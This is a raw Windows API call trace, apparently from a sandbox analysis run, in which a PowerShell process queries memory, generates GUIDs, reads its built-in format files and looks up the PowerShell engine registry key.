	[0294.236] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.236] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x188fa766, Data2=0x41e9, Data3=0x4192, Data4=([0]=0xac, [1]=0x71, [2]=0x55, [3]=0xa2, [4]=0xa8, [5]=0x4d, [6]=0x1, [7]=0x0))) returned 0x0
	[0294.237] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.238] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.239] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xd257f3a8, Data2=0xae83, Data3=0x443f, Data4=([0]=0x8d, [1]=0x99, [2]=0x37, [3]=0x5e, [4]=0x63, [5]=0x2, [6]=0xb3, [7]=0x76))) returned 0x0
	[0294.239] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xf18dbf19, Data2=0x435, Data3=0x4bf6, Data4=([0]=0xac, [1]=0xe2, [2]=0xe2, [3]=0x3a, [4]=0x99, [5]=0xf0, [6]=0x4e, [7]=0xe2))) returned 0x0
	[0294.239] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xefc27e97, Data2=0x62d, Data3=0x4b87, Data4=([0]=0x94, [1]=0x2f, [2]=0xe1, [3]=0x80, [4]=0xb9, [5]=0x3a, [6]=0xd, [7]=0x70))) returned 0x0
	[0294.239] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x5b4045d4, Data2=0xe079, Data3=0x402b, Data4=([0]=0xb2, [1]=0xde, [2]=0x55, [3]=0xfe, [4]=0xe5, [5]=0xa7, [6]=0x9a, [7]=0x69))) returned 0x0
	[0294.239] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.240] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x9208de18, Data2=0xc425, Data3=0x4dec, Data4=([0]=0xa6, [1]=0x57, [2]=0x7f, [3]=0x3e, [4]=0x3, [5]=0x7d, [6]=0xf7, [7]=0x80))) returned 0x0
	[0294.240] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.242] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.243] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.243] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.243] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.243] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x9391faf1, Data2=0xf738, Data3=0x400d, Data4=([0]=0xaf, [1]=0xcb, [2]=0x2d, [3]=0x65, [4]=0x74, [5]=0xd3, [6]=0x2, [7]=0xe1))) returned 0x0
	[0294.243] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x94f01aeb, Data2=0xa529, Data3=0x4c49, Data4=([0]=0xbb, [1]=0xb3, [2]=0xcb, [3]=0xa6, [4]=0x59, [5]=0x8f, [6]=0xf0, [7]=0x53))) returned 0x0
	[0294.243] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xb1140e5e, Data2=0x452d, Data3=0x4677, Data4=([0]=0xa1, [1]=0x4a, [2]=0x59, [3]=0x49, [4]=0x33, [5]=0x3a, [6]=0x9d, [7]=0x5))) returned 0x0
	[0294.244] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x4464591a, Data2=0xc10c, Data3=0x4310, Data4=([0]=0x80, [1]=0xfd, [2]=0x64, [3]=0xee, [4]=0xd2, [5]=0xab, [6]=0xd4, [7]=0x28))) returned 0x0
	[0294.244] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xf5cf18e6, Data2=0x6c46, Data3=0x4c3b, Data4=([0]=0x83, [1]=0x19, [2]=0x91, [3]=0xa2, [4]=0x2, [5]=0x33, [6]=0xbe, [7]=0x91))) returned 0x0
	[0294.244] VirtualQuery (in: lpAddress=0x1abfc0, lpBuffer=0x1ace80, dwLength=0x30 | out: lpBuffer=0x1ace80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.244] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x116c7aa7, Data2=0x8354, Data3=0x4075, Data4=([0]=0xae, [1]=0xc0, [2]=0x24, [3]=0x81, [4]=0xdf, [5]=0x74, [6]=0xb9, [7]=0x4f))) returned 0x0
	[0294.244] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x355f2d66, Data2=0x5133, Data3=0x4f30, Data4=([0]=0x8d, [1]=0x7a, [2]=0xe0, [3]=0x64, [4]=0x12, [5]=0xe3, [6]=0x77, [7]=0xdf))) returned 0x0
	[0294.244] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x4e561774, Data2=0xfcf0, Data3=0x4aea, Data4=([0]=0x9a, [1]=0x70, [2]=0xb9, [3]=0x7d, [4]=0xec, [5]=0x80, [6]=0x40, [7]=0xcb))) returned 0x0
	[0294.244] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x5d35ffd4, Data2=0x5e53, Data3=0x4f61, Data4=([0]=0x83, [1]=0x1, [2]=0x2b, [3]=0x68, [4]=0x4d, [5]=0x65, [6]=0x52, [7]=0xf5))) returned 0x0
	[0294.244] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xa36eb1f5, Data2=0xe58a, Data3=0x421e, Data4=([0]=0x94, [1]=0xc7, [2]=0x8d, [3]=0x41, [4]=0x9b, [5]=0x7a, [6]=0x76, [7]=0xa0))) returned 0x0
	[0294.245] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xb745d1a4, Data2=0x7e22, Data3=0x44df, Data4=([0]=0x81, [1]=0x1d, [2]=0x7, [3]=0x46, [4]=0x4a, [5]=0xb, [6]=0xa, [7]=0xa0))) returned 0x0
	[0294.245] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xe53567d6, Data2=0x1ed8, Data3=0x477b, Data4=([0]=0x85, [1]=0x88, [2]=0xdb, [3]=0x28, [4]=0x6c, [5]=0x55, [6]=0xda, [7]=0x33))) returned 0x0
	[0294.245] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xfeb23ed5, Data2=0xdac2, Data3=0x40d3, Data4=([0]=0xa8, [1]=0x2e, [2]=0x6f, [3]=0x68, [4]=0x75, [5]=0xba, [6]=0xe8, [7]=0xf8))) returned 0x0
	[0294.245] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x8875a31e, Data2=0xdfd0, Data3=0x4278, Data4=([0]=0x8c, [1]=0xa2, [2]=0xa5, [3]=0xc2, [4]=0x99, [5]=0xd0, [6]=0x98, [7]=0xe3))) returned 0x0
	[0294.245] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x2cb443ed, Data2=0x383f, Data3=0x426f, Data4=([0]=0xa9, [1]=0xd, [2]=0xca, [3]=0x92, [4]=0x4a, [5]=0xa3, [6]=0xdd, [7]=0xe3))) returned 0x0
	[0294.245] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x26672482, Data2=0xa02d, Data3=0x4895, Data4=([0]=0xb9, [1]=0x7c, [2]=0xe1, [3]=0xa0, [4]=0xc5, [5]=0x15, [6]=0xda, [7]=0x79))) returned 0x0
	[0294.245] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x561d4145, Data2=0xa441, Data3=0x41f4, Data4=([0]=0x8e, [1]=0xa1, [2]=0x5b, [3]=0x6f, [4]=0xae, [5]=0x47, [6]=0xdf, [7]=0x31))) returned 0x0
	[0294.245] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xc4e78243, Data2=0xc4cc, Data3=0x4fe7, Data4=([0]=0xbe, [1]=0xe9, [2]=0x8e, [3]=0x93, [4]=0x14, [5]=0x61, [6]=0x7a, [7]=0x79))) returned 0x0
	[0294.246] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xd0a6c730, Data2=0x6e26, Data3=0x40a6, Data4=([0]=0x93, [1]=0x4c, [2]=0xf7, [3]=0x7e, [4]=0x80, [5]=0x3f, [6]=0xf3, [7]=0xf0))) returned 0x0
	[0294.246] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x2ed03a86, Data2=0xbab, Data3=0x4fd0, Data4=([0]=0x97, [1]=0xce, [2]=0xdd, [3]=0xec, [4]=0x8e, [5]=0x9d, [6]=0x39, [7]=0xc7))) returned 0x0
	[0294.246] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x3f974ba8, Data2=0x4d16, Data3=0x4213, Data4=([0]=0x98, [1]=0x8e, [2]=0xd3, [3]=0x8e, [4]=0xed, [5]=0x51, [6]=0xf4, [7]=0x5))) returned 0x0
	[0294.246] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x6b2e3cbd, Data2=0x2d2d, Data3=0x4877, Data4=([0]=0x99, [1]=0x16, [2]=0xb, [3]=0x9e, [4]=0x7b, [5]=0xe4, [6]=0xf, [7]=0xf9))) returned 0x0
	[0294.246] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x42ef375a, Data2=0x4cd5, Data3=0x4814, Data4=([0]=0xb2, [1]=0xfd, [2]=0x80, [3]=0xa4, [4]=0x59, [5]=0xe3, [6]=0xd9, [7]=0x1f))) returned 0x0
	[0294.246] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x38576afe, Data2=0xc69, Data3=0x4d2d, Data4=([0]=0x91, [1]=0x4b, [2]=0x78, [3]=0x26, [4]=0x26, [5]=0xcf, [6]=0xb6, [7]=0xc1))) returned 0x0
	[0294.246] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.247] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.247] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.247] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x10d587ff, Data2=0x962a, Data3=0x47e5, Data4=([0]=0x98, [1]=0x2f, [2]=0x48, [3]=0x2f, [4]=0x31, [5]=0x30, [6]=0xa6, [7]=0x1f))) returned 0x0
	[0294.247] SetErrorMode (uMode=0x1) returned 0x1
	[0294.248] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0294.248] GetFileType (hFile=0x32c) returned 0x1
	[0294.248] SetErrorMode (uMode=0x1) returned 0x1
	[0294.248] GetFileType (hFile=0x32c) returned 0x1
	[0294.248] ReadFile (in: hFile=0x32c, lpBuffer=0x2e21950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e21950*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.249] ReadFile (in: hFile=0x32c, lpBuffer=0x2e21950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e21950*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.249] ReadFile (in: hFile=0x32c, lpBuffer=0x2e21950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e21950*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.249] ReadFile (in: hFile=0x32c, lpBuffer=0x2e21950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e21950*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.249] ReadFile (in: hFile=0x32c, lpBuffer=0x2e21950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e21950*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.250] ReadFile (in: hFile=0x32c, lpBuffer=0x2e21950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e21950*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.250] ReadFile (in: hFile=0x32c, lpBuffer=0x2e21950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e21950*, lpNumberOfBytesRead=0x1ad098*=0x119, lpOverlapped=0x0) returned 1
	[0294.250] ReadFile (in: hFile=0x32c, lpBuffer=0x2e21950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e21950*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0294.777] SetErrorMode (uMode=0x1) returned 0x1
	[0294.777] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad040 | out: lpFileInformation=0x1ad040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0294.777] SetErrorMode (uMode=0x1) returned 0x1
	[0294.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0294.778] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad128 | out: phkResult=0x1ad128*=0x32c) returned 0x0
	[0294.778] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0ac, lpData=0x0, lpcbData=0x1ad0a8*=0x0 | out: lpType=0x1ad0ac*=0x1, lpData=0x0, lpcbData=0x1ad0a8*=0x56) returned 0x0
	[0294.778] CoTaskMemAlloc (cb=0x5a) returned 0x1b6ea6d0
	[0294.778] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad07c, lpData=0x1b6ea6d0, lpcbData=0x1ad078*=0x56 | out: lpType=0x1ad07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad078*=0x56) returned 0x0
	[0294.778] CoTaskMemFree (pv=0x1b6ea6d0) 
	[0294.778] RegCloseKey (hKey=0x32c) returned 0x0
	[0294.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0294.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0294.779] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.779] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x6169d13c, Data2=0x52a1, Data3=0x4e9b, Data4=([0]=0x8b, [1]=0x40, [2]=0x81, [3]=0xf0, [4]=0xaa, [5]=0xc8, [6]=0x43, [7]=0x42))) returned 0x0
	[0294.779] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.779] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x71910aad, Data2=0x2201, Data3=0x492e, Data4=([0]=0xbf, [1]=0x90, [2]=0xa7, [3]=0x9d, [4]=0xaf, [5]=0x8d, [6]=0x63, [7]=0x49))) returned 0x0
	[0294.780] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xaa81746f, Data2=0x7920, Data3=0x4d0a, Data4=([0]=0x9b, [1]=0x5c, [2]=0x7d, [3]=0x9f, [4]=0x98, [5]=0x44, [6]=0xeb, [7]=0xaf))) returned 0x0
	[0294.780] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xcf83e96f, Data2=0xc936, Data3=0x4c4a, Data4=([0]=0xa5, [1]=0x42, [2]=0x43, [3]=0x85, [4]=0xd2, [5]=0x99, [6]=0x3e, [7]=0x55))) returned 0x0
	[0294.780] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.780] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.780] SetErrorMode (uMode=0x1) returned 0x1
	[0294.780] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0294.781] GetFileType (hFile=0x32c) returned 0x1
	[0294.781] SetErrorMode (uMode=0x1) returned 0x1
	[0294.781] GetFileType (hFile=0x32c) returned 0x1
	[0294.781] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.782] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.782] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.782] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.782] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.783] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.783] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.783] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.784] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.784] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.784] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.785] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.785] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.785] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.801] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.802] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.803] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.803] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.803] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.804] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.804] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
